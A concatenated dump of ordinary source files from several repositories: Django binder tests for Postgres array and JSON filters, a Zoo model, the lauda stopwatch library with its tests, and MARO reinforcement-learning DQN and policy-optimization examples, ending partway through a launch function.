        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        response = self.client.get('/feeding_schedule/', data={'.foods:overlap': ''})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))
    def test_get_collection_arrayfield_contains_filtering(self):
        """`:contains` requires all given elements; the empty value matches everything."""
        response = self.client.get('/feeding_schedule/', data={'.foods:contains': 'corn,bugs'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        # No single row contains both corn and meat.
        response = self.client.get('/feeding_schedule/', data={'.foods:contains': 'corn,meat'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        response = self.client.get('/feeding_schedule/', data={'.foods:contains': 'corn'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        # Every array contains the empty set of elements.
        response = self.client.get('/feeding_schedule/', data={'.foods:contains': ''})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(2, len(result['data']))
    def test_get_collection_jsonfield_contains_filtering(self):
        """`:contains` on JSON matches documents containing the given sub-document."""
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{"10:30": ["meat"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])

        # Embedded commas should not produce issues
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{"10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        # Mixing keys from different rows matches nothing.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{"10:30": ["meat"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        # Every document contains the empty document.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(2, len(result['data']))
    def test_get_collection_jsonfield_invalid_json_filtering_fails(self):
        """Malformed JSON filter values produce a RequestError (HTTP 418)."""
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contains': '{'})
        self.assertEqual(response.status_code, 418)
        result = jsonloads(response.content)
        self.assertEqual('RequestError', result['code'])

        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{'})
        self.assertEqual(response.status_code, 418)
        result = jsonloads(response.content)
        self.assertEqual('RequestError', result['code'])
    def test_get_collection_arrayfield_contained_by_filtering(self):
        """`:contained_by` matches arrays that are subsets of the given values."""
        response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn,bugs'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn,meat'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.coyote_feeding.id, result['data'][0]['id'])

        # 'corn' alone is not a superset of either stored array.
        response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': ''})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        # A superset of all stored values matches every row.
        response = self.client.get('/feeding_schedule/', data={'.foods:contained_by': 'corn,meat,bugs,whatever'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(2, len(result['data']))
    def test_get_collection_jsonfield_contained_by_filtering(self):
        """`:contained_by` on JSON matches documents that are sub-documents of the value."""
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["meat"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        # Embedded commas should not produce issues
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["meat"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(0, len(result['data']))

        # Extra keys in the supplied document are allowed.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:29": ["meat"], "10:30": ["corn"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])

        # This is a bit odd; first array is contained by the
        # supplied array; in other words, we match recursively.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:contained_by': '{"10:30": ["corn", "meat"], "16:00": ["corn", "bugs"]}'})
        self.assertEqual(response.status_code, 200)
        result = jsonloads(response.content)
        self.assertEqual(1, len(result['data']))
        self.assertEqual(self.rr_feeding.id, result['data'][0]['id'])
def test_get_collection_jsonfield_has_key(self):
    """:has_key matches records whose JSON document contains the literal key."""
    def query(expr):
        # Issue the filter request, check HTTP 200 and return the data list.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_key': expr})
        self.assertEqual(response.status_code, 200)
        return jsonloads(response.content)['data']

    self.assertEqual(2, len(query('10:30')))
    # Embedded commas should not be parsed (see has_[any_]keys instead)
    self.assertEqual(0, len(query('10:30,16:00')))
    self.assertEqual(0, len(query('15:00')))
    self.assertEqual(0, len(query('')))
def test_get_collection_jsonfield_has_keys(self):
    """:has_keys matches records whose JSON document contains ALL of the comma-separated keys."""
    def query(expr):
        # Issue the filter request, check HTTP 200 and return the data list.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_keys': expr})
        self.assertEqual(response.status_code, 200)
        return jsonloads(response.content)['data']

    self.assertEqual(2, len(query('10:30')))
    # Embedded commas should be parsed
    self.assertEqual(2, len(query('10:30,16:00')))
    self.assertEqual(0, len(query('15:00')))
    self.assertEqual(0, len(query('10:30,15:00,16:00')))
    # An empty key list constrains nothing.
    self.assertEqual(2, len(query('')))
def test_get_collection_jsonfield_has_any_keys(self):
    """:has_any_keys matches records whose JSON document contains ANY of the comma-separated keys."""
    def query(expr):
        # Issue the filter request, check HTTP 200 and return the data list.
        response = self.client.get('/feeding_schedule/', data={'.schedule_details:has_any_keys': expr})
        self.assertEqual(response.status_code, 200)
        return jsonloads(response.content)['data']

    self.assertEqual(2, len(query('10:30')))
    # Embedded commas should be parsed
    self.assertEqual(2, len(query('10:30,16:00')))
    self.assertEqual(0, len(query('15:00')))
    self.assertEqual(2, len(query('10:30,15:00,16:00')))
    # An empty key list matches nothing (no key can be present).
    self.assertEqual(0, len(query('')))
--- FILE SEPARATOR ---
import os
import datetime
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_delete
from binder.models import BinderModel
def delete_files(sender, instance=None, **kwargs):
    """Signal handler: remove from disk the file behind every FileField of the deleted instance."""
    for model_field in sender._meta.fields:
        if not isinstance(model_field, models.fields.files.FileField):
            continue
        try:
            os.unlink(getattr(instance, model_field.name).path)
        except (FileNotFoundError, ValueError):
            # Either the file is already gone from disk, or the field
            # has no file associated (``.path`` raises ValueError).
            pass
# From the api docs: a zoo with a name. It also has a founding date,
# which is nullable (representing "unknown").
class Zoo(BinderModel):
    """A zoo with a name, optional founding date and floor plan image,
    contact persons, and a set of most popular animals."""
    name = models.TextField()
    # null founding_date represents "unknown".
    founding_date = models.DateField(null=True, blank=True)
    floor_plan = models.ImageField(upload_to='floor-plans', null=True, blank=True)
    contacts = models.ManyToManyField('ContactPerson', blank=True, related_name='zoos')
    # related_name='+' disables the reverse accessor from Animal.
    most_popular_animals = models.ManyToManyField('Animal', blank=True, related_name='+')
    opening_time = models.TimeField(default=datetime.time(9, 0, 0))

    def __str__(self):
        return 'zoo %d: %s' % (self.pk, self.name)

    @property
    def animal_count(self):
        # Count via the reverse 'animals' relation — presumably a FK on
        # Animal with related_name='animals', defined elsewhere (verify).
        return self.animals.count()

    def clean(self):
        """Model validation: the zoo named 'Nowhere' may not have a floor plan."""
        errors = {}
        if self.floor_plan and self.name == 'Nowhere':
            errors['floor_plan'] = ValidationError('Nowhere may not have a floor plan!', code='no plan')
            # NOTE(review): the 'name' error reuses the floor-plan message but
            # carries a distinct code; confirm against tests whether intentional.
            errors['name'] = ValidationError('Nowhere may not have a floor plan!', code='nowhere')
        if errors:
            raise ValidationError(errors)


# Clean up uploaded files (e.g. floor_plan) from disk when a Zoo is deleted.
post_delete.connect(delete_files, sender=Zoo)
|
[
"/binder/models.py",
"/tests/test_file_uploads.py",
"/tests/test_postgres_fields.py",
"/tests/testapp/models/zoo.py"
] |
00mjk/lauda
|
# lauda
# Copyright 2015 Andrea Stagi
# See LICENSE for details.
"""
Lauda - A very simple python module for measuring time
"""
from .stopwatch import StopWatch, StopWatchException
from .decorators import stopwatch
from .contextmanager import stopwatch as stopwatchcm
# Package metadata.
__version__ = '1.2.0'
__author__ = 'Andrea Stagi'
__license__ = 'MIT'

# Public API re-exported from the submodules above.
__all__ = ['StopWatch', 'StopWatchException', 'stopwatch', 'stopwatchcm']
--- FILE SEPARATOR ---
from contextlib import contextmanager
from .stopwatch import StopWatch
@contextmanager
def stopwatch(callback=None):
    """Context manager that measures the wall-clock time of its body.

    Args:
        callback: optional callable invoked with the StopWatch instance when
            the block finishes; if omitted, the elapsed time is printed.

    The stop/report step runs in a ``finally`` clause, so the watch is
    stopped and the result reported even when the managed block raises
    (previously an exception skipped ``watch.stop()`` entirely and the
    timing was silently lost). The exception still propagates.
    """
    watch = StopWatch()
    watch.start()
    try:
        yield
    finally:
        elapsed = watch.stop()
        if callback:
            callback(watch)
        else:
            print('Executed in {0} seconds'.format(elapsed))
--- FILE SEPARATOR ---
import unittest
import time
from mock import Mock, patch
from lauda import StopWatch, stopwatch, stopwatchcm
class TestContextManager(unittest.TestCase):
    """Tests for the ``stopwatchcm`` context manager (lauda.contextmanager)."""

    # Note: @patch decorators apply bottom-up, so the innermost patch
    # ('start') is bound to the first mock parameter.
    @patch('lauda.StopWatch.stop')
    @patch('lauda.StopWatch.start')
    def test_stopwatch(self, mock_stopwatch_start, mock_stopwatch_stop):
        """Entering and leaving the context starts and stops the watch."""
        with stopwatchcm():
            time.sleep(0.1)
        mock_stopwatch_start.assert_called_with()
        mock_stopwatch_stop.assert_called_with()

    @patch('lauda.StopWatch.stop')
    @patch('lauda.StopWatch.start')
    def test_stopwatch_callback(self, mock_stopwatch_start, mock_stopwatch_stop):
        """The callback fires exactly once, after the block, with the StopWatch."""
        my_callback = Mock(return_value=None)
        with stopwatchcm(callback=my_callback):
            time.sleep(0.1)
            # Still inside the managed block: callback must not have fired yet.
            self.assertFalse(my_callback.called)
        self.assertTrue(my_callback.called)
        callback_args = my_callback.call_args
        # Called with a single positional argument: the StopWatch instance.
        self.assertTrue(isinstance(callback_args[0][0], StopWatch))
        self.assertTrue(len(callback_args[0]) == 1)
        mock_stopwatch_start.assert_called_with()
        mock_stopwatch_stop.assert_called_with()
--- FILE SEPARATOR ---
import unittest
from lauda import StopWatch, StopWatchException
class TestStopwatch(unittest.TestCase):
    """Behavioral tests for lauda.StopWatch."""

    def test_stopwatch(self):
        """start/stop return sane values and elapsed_time equals stop - start."""
        sw = StopWatch()
        self.assertTrue(sw.start() > 0)
        elapsed = sw.stop()
        self.assertTrue(elapsed > 0)
        self.assertEqual(elapsed, sw.elapsed_time)
        self.assertEqual(elapsed, sw.stop_time - sw.start_time)

    def test_stopwatch_checkpoint(self):
        """Intermediate checkpoints never add up to more than the total."""
        sw = StopWatch()
        sw.start()
        first = sw.checkpoint()
        second = sw.checkpoint()
        total = sw.stop()
        self.assertTrue(first + second <= total)

    def test_stopwatch_exceptions(self):
        """Stopping a never-started watch raises StopWatchException."""
        sw = StopWatch()
        self.assertRaises(StopWatchException, sw.stop)

    def test_elapsed_time(self):
        """elapsed_time is readable mid-run and smaller than the final total."""
        sw = StopWatch()
        sw.start()
        ongoing = sw.elapsed_time
        final = sw.stop()
        self.assertTrue(ongoing > 0)
        self.assertTrue(ongoing < final)

    def test_elapsed_time_zero(self):
        """Before start, elapsed_time is zero and checkpoint raises."""
        sw = StopWatch()
        self.assertEqual(sw.elapsed_time, 0)
        self.assertRaises(StopWatchException, sw.checkpoint)
|
[
"/lauda/__init__.py",
"/lauda/contextmanager.py",
"/tests/test_contextmanager.py",
"/tests/test_stopwatch.py"
] |
00mjk/maro
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .action_shaper import CIMActionShaper
from .agent_manager import DQNAgentManager, create_dqn_agents
from .experience_shaper import TruncatedExperienceShaper
from .state_shaper import CIMStateShaper
# Public API of the DQN example's components package.
__all__ = [
    "CIMActionShaper",
    "DQNAgentManager", "create_dqn_agents",
    "TruncatedExperienceShaper",
    "CIMStateShaper"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import pickle
import numpy as np
from maro.rl import AbsAgent, ColumnBasedStore
class DQNAgent(AbsAgent):
    """Agent specialization for DQN with a loss-prioritized experience pool.

    Args:
        name (str): Agent's name.
        algorithm (AbsAlgorithm): Concrete algorithm instance driving training.
        experience_pool (AbsStore): Stores shaped experiences; sampling is
            weighted by each entry's recorded TD loss.
        min_experiences_to_train: training is skipped until the pool holds at
            least this many experiences.
        num_batches: number of mini-batches per ``train()`` call.
        batch_size: mini-batch size.
    """

    def __init__(
        self,
        name: str,
        algorithm,
        experience_pool: ColumnBasedStore,
        min_experiences_to_train,
        num_batches,
        batch_size
    ):
        super().__init__(name, algorithm, experience_pool=experience_pool)
        self._min_experiences_to_train = min_experiences_to_train
        self._num_batches = num_batches
        self._batch_size = batch_size

    def train(self):
        """Run the DQN training loop.

        Batches are drawn with TD-error ("loss") weighted sampling; after each
        update the refreshed TD errors are written back to the pool.
        """
        if len(self._experience_pool) < self._min_experiences_to_train:
            return
        for _ in range(self._num_batches):
            indexes, batch = self._experience_pool.sample_by_key("loss", self._batch_size)
            states, actions, rewards, next_states = (
                np.asarray(batch[column]) for column in ("state", "action", "reward", "next_state")
            )
            new_losses = self._algorithm.train(states, actions, rewards, next_states)
            self._experience_pool.update(indexes, {"loss": new_losses})

    def dump_experience_pool(self, dir_path: str):
        """Pickle this agent's experience pool to ``dir_path/<agent name>``."""
        os.makedirs(dir_path, exist_ok=True)
        with open(os.path.join(dir_path, self._name), "wb") as fp:
            pickle.dump(self._experience_pool, fp)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch.nn as nn
from torch.optim import RMSprop
from maro.rl import (
ColumnBasedStore, DQN, DQNConfig, FullyConnectedBlock, LearningModel, NNStack, OptimizerOptions,
SimpleAgentManager
)
from maro.utils import set_seeds
from .agent import DQNAgent
def create_dqn_agents(agent_id_list, config):
    """Build one DQNAgent per id in ``agent_id_list`` from the dotted ``config``.

    Global RNG seeds are set first, so the per-agent network construction
    order below determines the (reproducible) weight initialization.
    """
    num_actions = config.algorithm.num_actions
    set_seeds(config.seed)
    agent_dict = {}
    for agent_id in agent_id_list:
        # Single fully-connected Q-value head over the shaped state vector.
        q_net = NNStack(
            "q_value",
            FullyConnectedBlock(
                input_dim=config.algorithm.input_dim,
                output_dim=num_actions,
                activation=nn.LeakyReLU,
                is_head=True,
                **config.algorithm.model
            )
        )
        learning_model = LearningModel(
            q_net,
            optimizer_options=OptimizerOptions(cls=RMSprop, params=config.algorithm.optimizer)
        )
        algorithm = DQN(
            learning_model,
            DQNConfig(**config.algorithm.hyper_params, loss_cls=nn.SmoothL1Loss)
        )
        # Each agent gets its own experience pool and training-loop settings.
        agent_dict[agent_id] = DQNAgent(
            agent_id, algorithm, ColumnBasedStore(**config.experience_pool),
            **config.training_loop_parameters
        )
    return agent_dict
class DQNAgentManager(SimpleAgentManager):
    """Agent manager that feeds each agent its experiences before training."""

    def train(self, experiences_by_agent, performance=None):
        self._assert_train_mode()
        # Hand each agent its own experiences. New entries are tagged with a
        # very large loss so loss-weighted sampling prioritizes fresh samples.
        for agent_id, experiences in experiences_by_agent.items():
            num_entries = len(list(experiences.values())[0])
            experiences.update({"loss": [1e8] * num_entries})
            self.agent_dict[agent_id].store_experiences(experiences)
        for agent in self.agent_dict.values():
            agent.train()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
This file is used to load the configuration and convert it into a dotted dictionary.
"""
import io
import os
import yaml

# Paths are resolved relative to this file so the example scripts work
# regardless of the current working directory. Both YAML files are read
# once at import time (module-level side effect).
CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "../config.yml")
with io.open(CONFIG_PATH, "r") as in_file:
    # Settings shared by single-process and distributed runs.
    config = yaml.safe_load(in_file)

DISTRIBUTED_CONFIG_PATH = os.path.join(os.path.split(os.path.realpath(__file__))[0], "../distributed_config.yml")
with io.open(DISTRIBUTED_CONFIG_PATH, "r") as in_file:
    # Settings used only in distributed (actor/learner) mode.
    distributed_config = yaml.safe_load(in_file)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import numpy as np
from maro.rl import ActorWorker, AgentManagerMode, SimpleActor
from maro.simulator import Env
from maro.utils import convert_dottable
from components import CIMActionShaper, CIMStateShaper, DQNAgentManager, TruncatedExperienceShaper, create_dqn_agents
def launch(config, distributed_config):
    """Run the distributed ACTOR side of the CIM DQN example.

    Builds an inference-mode agent manager wired with the state/action/
    experience shapers, then blocks serving rollout requests from the learner.
    """
    config = convert_dottable(config)
    distributed_config = convert_dottable(distributed_config)
    env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
    agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
    state_shaper = CIMStateShaper(**config.env.state_shaping)
    action_shaper = CIMActionShaper(action_space=list(np.linspace(-1.0, 1.0, config.agents.algorithm.num_actions)))
    experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
    # The Q-network input size depends on the state shaper's output dimension.
    config["agents"]["algorithm"]["input_dim"] = state_shaper.dim
    agent_manager = DQNAgentManager(
        name="cim_actor",
        mode=AgentManagerMode.INFERENCE,
        agent_dict=create_dqn_agents(agent_id_list, config.agents),
        state_shaper=state_shaper,
        action_shaper=action_shaper,
        experience_shaper=experience_shaper
    )
    # Environment variables (set by the multi-process launcher) take
    # precedence over the YAML settings.
    proxy_params = {
        "group_name": os.environ["GROUP"] if "GROUP" in os.environ else distributed_config.group,
        "expected_peers": {"learner": 1},
        "redis_address": (distributed_config.redis.hostname, distributed_config.redis.port),
        "max_retries": 15
    }
    actor_worker = ActorWorker(
        local_actor=SimpleActor(env=env, agent_manager=agent_manager),
        proxy_params=proxy_params
    )
    # Blocks, serving rollout requests until the learner signals exit.
    actor_worker.launch()


if __name__ == "__main__":
    from components.config import config, distributed_config
    launch(config=config, distributed_config=distributed_config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from maro.rl import (
ActorProxy, AgentManagerMode, SimpleLearner, TwoPhaseLinearParameterScheduler, concat_experiences_by_agent
)
from maro.simulator import Env
from maro.utils import Logger, convert_dottable
from components import CIMStateShaper, DQNAgentManager, create_dqn_agents
def launch(config, distributed_config):
    """Run the distributed LEARNER side of the CIM DQN example.

    Builds a training-mode agent manager, connects to the actor processes
    through Redis, runs the learning loop, then tests and dumps the models.
    """
    config = convert_dottable(config)
    distributed_config = convert_dottable(distributed_config)
    env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
    agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
    # The Q-network input size depends on the state shaper's output dimension.
    config["agents"]["algorithm"]["input_dim"] = CIMStateShaper(**config.env.state_shaping).dim
    agent_manager = DQNAgentManager(
        name="cim_learner",
        mode=AgentManagerMode.TRAIN,
        agent_dict=create_dqn_agents(agent_id_list, config.agents)
    )
    # Environment variables (set by the multi-process launcher) take
    # precedence over the YAML settings for group name and actor count.
    proxy_params = {
        "group_name": os.environ["GROUP"] if "GROUP" in os.environ else distributed_config.group,
        "expected_peers": {
            "actor": int(os.environ["NUM_ACTORS"] if "NUM_ACTORS" in os.environ else distributed_config.num_actors)
        },
        "redis_address": (distributed_config.redis.hostname, distributed_config.redis.port),
        "max_retries": 15
    }
    learner = SimpleLearner(
        agent_manager=agent_manager,
        actor=ActorProxy(proxy_params=proxy_params, experience_collecting_func=concat_experiences_by_agent),
        scheduler=TwoPhaseLinearParameterScheduler(config.main_loop.max_episode, **config.main_loop.exploration),
        logger=Logger("cim_learner", auto_timestamp=False)
    )
    learner.learn()
    learner.test()
    learner.dump_models(os.path.join(os.getcwd(), "models"))
    # Tell remote actors to shut down.
    learner.exit()


if __name__ == "__main__":
    from components.config import config, distributed_config
    launch(config=config, distributed_config=distributed_config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import numpy as np
from maro.rl import AgentManagerMode, SimpleActor, SimpleLearner, TwoPhaseLinearParameterScheduler
from maro.simulator import Env
from maro.utils import LogFormat, Logger, convert_dottable
from components import CIMActionShaper, CIMStateShaper, DQNAgentManager, TruncatedExperienceShaper, create_dqn_agents
def launch(config):
    """Single-process training entry point for the CIM DQN example."""
    config = convert_dottable(config)
    # Step 1: Initialize a CIM environment for using a toy dataset.
    env = Env(config.env.scenario, config.env.topology, durations=config.env.durations)
    agent_id_list = [str(agent_id) for agent_id in env.agent_idx_list]
    action_space = list(np.linspace(-1.0, 1.0, config.agents.algorithm.num_actions))
    # Step 2: Create state, action and experience shapers. We also need to create an explorer here due to the
    # greedy nature of the DQN algorithm.
    state_shaper = CIMStateShaper(**config.env.state_shaping)
    action_shaper = CIMActionShaper(action_space=action_space)
    experience_shaper = TruncatedExperienceShaper(**config.env.experience_shaping)
    # Step 3: Create agents and an agent manager.
    # The Q-network input size depends on the state shaper's output dimension.
    config["agents"]["algorithm"]["input_dim"] = state_shaper.dim
    agent_manager = DQNAgentManager(
        name="cim_learner",
        mode=AgentManagerMode.TRAIN_INFERENCE,
        agent_dict=create_dqn_agents(agent_id_list, config.agents),
        state_shaper=state_shaper,
        action_shaper=action_shaper,
        experience_shaper=experience_shaper
    )
    # Step 4: Create an actor and a learner to start the training process.
    scheduler = TwoPhaseLinearParameterScheduler(config.main_loop.max_episode, **config.main_loop.exploration)
    actor = SimpleActor(env, agent_manager)
    learner = SimpleLearner(
        agent_manager, actor, scheduler,
        logger=Logger("cim_learner", format_=LogFormat.simple, auto_timestamp=False)
    )
    learner.learn()
    learner.test()
    learner.dump_models(os.path.join(os.getcwd(), "models"))


if __name__ == "__main__":
    from components.config import config
    launch(config)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .action_shaper import CIMActionShaper
from .agent_manager import POAgentManager, create_po_agents
from .experience_shaper import TruncatedExperienceShaper
from .state_shaper import CIMStateShaper
# Public API of the policy-optimization example's components package.
__all__ = [
    "CIMActionShaper",
    "POAgentManager", "create_po_agents",
    "TruncatedExperienceShaper",
    "CIMStateShaper"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import numpy as np
import torch.nn as nn
from torch.optim import Adam, RMSprop
from maro.rl import (
AbsAgent, ActorCritic, ActorCriticConfig, FullyConnectedBlock, LearningModel, NNStack,
OptimizerOptions, PolicyGradient, PolicyOptimizationConfig, SimpleAgentManager
)
from maro.utils import set_seeds
class POAgent(AbsAgent):
    """Policy-optimization agent: a thin delegator to the wrapped algorithm."""

    def train(self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray):
        """Train the underlying algorithm on one trajectory's worth of data."""
        self._algorithm.train(states, actions, log_action_prob, rewards)
def create_po_agents(agent_id_list, config):
    """Build one policy-optimization agent per id in ``agent_id_list``.

    ``config.type == "actor_critic"`` builds an actor + critic pair trained
    with ActorCritic; anything else builds a plain PolicyGradient agent.
    Global RNG seeds are set first, so the per-agent construction order
    determines the (reproducible) weight initialization.
    """
    input_dim, num_actions = config.input_dim, config.num_actions
    set_seeds(config.seed)
    agent_dict = {}
    for agent_id in agent_id_list:
        # Policy (actor) head: one logit per discrete action.
        actor_net = NNStack(
            "actor",
            FullyConnectedBlock(
                input_dim=input_dim,
                output_dim=num_actions,
                activation=nn.Tanh,
                is_head=True,
                **config.actor_model
            )
        )
        if config.type == "actor_critic":
            # Value (critic) head: scalar state-value estimate.
            critic_net = NNStack(
                "critic",
                FullyConnectedBlock(
                    input_dim=config.input_dim,
                    output_dim=1,
                    activation=nn.LeakyReLU,
                    is_head=True,
                    **config.critic_model
                )
            )
            hyper_params = config.actor_critic_hyper_parameters
            hyper_params.update({"reward_discount": config.reward_discount})
            # Separate optimizers for the actor and critic stacks.
            learning_model = LearningModel(
                actor_net, critic_net,
                optimizer_options={
                    "actor": OptimizerOptions(cls=Adam, params=config.actor_optimizer),
                    "critic": OptimizerOptions(cls=RMSprop, params=config.critic_optimizer)
                }
            )
            algorithm = ActorCritic(
                learning_model, ActorCriticConfig(critic_loss_func=nn.SmoothL1Loss(), **hyper_params)
            )
        else:
            learning_model = LearningModel(
                actor_net,
                optimizer_options=OptimizerOptions(cls=Adam, params=config.actor_optimizer)
            )
            algorithm = PolicyGradient(learning_model, PolicyOptimizationConfig(config.reward_discount))
        agent_dict[agent_id] = POAgent(name=agent_id, algorithm=algorithm)
    return agent_dict
class POAgentManager(SimpleAgentManager):
    """Routes each agent's collected trajectories to that agent for training."""

    def train(self, experiences_by_agent: dict):
        for agent_id, agent_exp in experiences_by_agent.items():
            # Normalize to a list of trajectories (a single dict means one).
            trajectories = agent_exp if isinstance(agent_exp, list) else [agent_exp]
            agent = self.agent_dict[agent_id]
            for trajectory in trajectories:
                agent.train(
                    trajectory["state"],
                    trajectory["action"],
                    trajectory["log_action_probability"],
                    trajectory["reward"]
                )
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import defaultdict
import numpy as np
from maro.rl import ExperienceShaper
class TruncatedExperienceShaper(ExperienceShaper):
    """Shapes a trajectory into per-agent experiences with rewards computed
    over a truncated, time-decayed window of future port statistics.

    Args:
        time_window: number of future ticks over which to accumulate reward.
        time_decay_factor: per-tick exponential decay applied to future stats.
        fulfillment_factor: weight of fulfilled orders in the reward.
        shortage_factor: weight (penalty) of container shortage in the reward.
    """
    def __init__(self, *, time_window: int, time_decay_factor: float, fulfillment_factor: float,
                 shortage_factor: float):
        super().__init__(reward_func=None)
        self._time_window = time_window
        self._time_decay_factor = time_decay_factor
        self._fulfillment_factor = fulfillment_factor
        self._shortage_factor = shortage_factor

    def __call__(self, trajectory, snapshot_list):
        """Group (state, action, log-prob, reward) arrays by agent id."""
        agent_ids = np.asarray(trajectory.get_by_key("agent_id"))
        states = np.asarray(trajectory.get_by_key("state"))
        actions = np.asarray(trajectory.get_by_key("action"))
        log_action_probabilities = np.asarray(trajectory.get_by_key("log_action_probability"))
        # One reward per decision event, computed from the snapshot history.
        rewards = np.fromiter(
            map(self._compute_reward, trajectory.get_by_key("event"), [snapshot_list] * len(trajectory)),
            dtype=np.float32
        )
        return {agent_id: {
            "state": states[agent_ids == agent_id],
            "action": actions[agent_ids == agent_id],
            "log_action_probability": log_action_probabilities[agent_ids == agent_id],
            "reward": rewards[agent_ids == agent_id],
        }
            for agent_id in set(agent_ids)}

    def _compute_reward(self, decision_event, snapshot_list):
        """Weighted, time-decayed fulfillment-minus-shortage over the window."""
        start_tick = decision_event.tick + 1
        end_tick = decision_event.tick + self._time_window
        ticks = list(range(start_tick, end_tick))
        # calculate tc reward
        future_fulfillment = snapshot_list["ports"][ticks::"fulfillment"]
        future_shortage = snapshot_list["ports"][ticks::"shortage"]
        # Repeat each decay weight once per port so the dot product lines up
        # with the flattened (tick, port) statistics vector.
        decay_list = [self._time_decay_factor ** i for i in range(end_tick - start_tick)
                      for _ in range(future_fulfillment.shape[0] // (end_tick - start_tick))]
        tot_fulfillment = np.dot(future_fulfillment, decay_list)
        tot_shortage = np.dot(future_shortage, decay_list)
        # Fix: use the builtin float. The np.float alias was deprecated in
        # NumPy 1.20 and removed in 1.24, so np.float(...) raises there.
        return float(self._fulfillment_factor * tot_fulfillment - self._shortage_factor * tot_shortage)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import numpy as np
from maro.simulator import Env
from maro.rl import AgentManagerMode, SimpleActor, ActorWorker
from maro.utils import convert_dottable
from components import CIMActionShaper, CIMStateShaper, POAgentManager, TruncatedExperienceShaper, create_po_agents
def launch(config):
